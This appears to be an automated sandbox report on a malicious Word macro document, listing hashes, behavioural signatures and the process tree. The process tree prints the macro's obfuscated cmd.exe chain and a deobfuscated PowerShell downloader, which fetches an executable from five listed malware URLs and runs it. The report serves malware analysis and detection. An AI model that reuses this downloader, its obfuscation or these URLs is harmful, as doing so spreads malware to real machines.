Overview

overview

10

Static

static

1

eef66e5036...18.doc

windows7-x64

10

eef66e5036...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 03:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    eef66e503617b6ae990bd1a90be931f0_JaffaCakes118.doc

  • Size

    198KB

  • MD5

    eef66e503617b6ae990bd1a90be931f0

  • SHA1

    89949a05d7b250a87d5e885d62ccfd934f8f00b6

  • SHA256

    e5066650466c3c3e97b614d8c6631a12f554cbfea3e2a8647153b4c1faa5177f

  • SHA512

    b0bf2f278c729885a5c843a99dc2d4b8a86cf21aa5aaf88841a0a8d2dc4cebadfba16d76178615c16765b80c985f01051fa95d5f35dac519b693f40bf47047ec

  • SSDEEP

    3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kantova.com/DWTr10bVVLjs5r
exe.dropper

http://www.hjsanders.nl/889KycAhSPlXPbrS
exe.dropper

http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW
exe.dropper

http://bozziro.ir/YENtfKb77bgd_Gk
exe.dropper

http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eef66e503617b6ae990bd1a90be931f0_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1644
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\n1855\d4825\j5329\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|%LOCALAPPDATA:~-3,-2%m%TMP:~-15,-14% "
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|cmD "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2632
        • C:\Windows\SysWOW64\cmd.exe
          cmD
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1632
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1916

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      1f5ae43af2ecf45e5426990f27b6f8d4

      SHA1

      40db390291f119e1ae04d6ba56891b5e99890bbf

      SHA256

      119a217e0c9e2606452d30901eecd27b9da77a6acbe19815d6f1031290eb875d

      SHA512

      dd71fce07b4665cab0adb3f0ad3be6dc02aa9d4dc0c6a0c13794e8ab5c264dbbfb44b912bc8a3d4b77041854a07c72bbd9c89f82aa8bfd3bc744290fc5a4e321

      Download Submit

    • memory/1644-31-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-2-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1644-13-0x00000000067F0000-0x00000000068F0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-12-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-26-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-0-0x000000002F081000-0x000000002F082000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1644-33-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-41-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-40-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1644-42-0x0000000005860000-0x0000000005960000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1644-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1644-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1644-65-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

      Download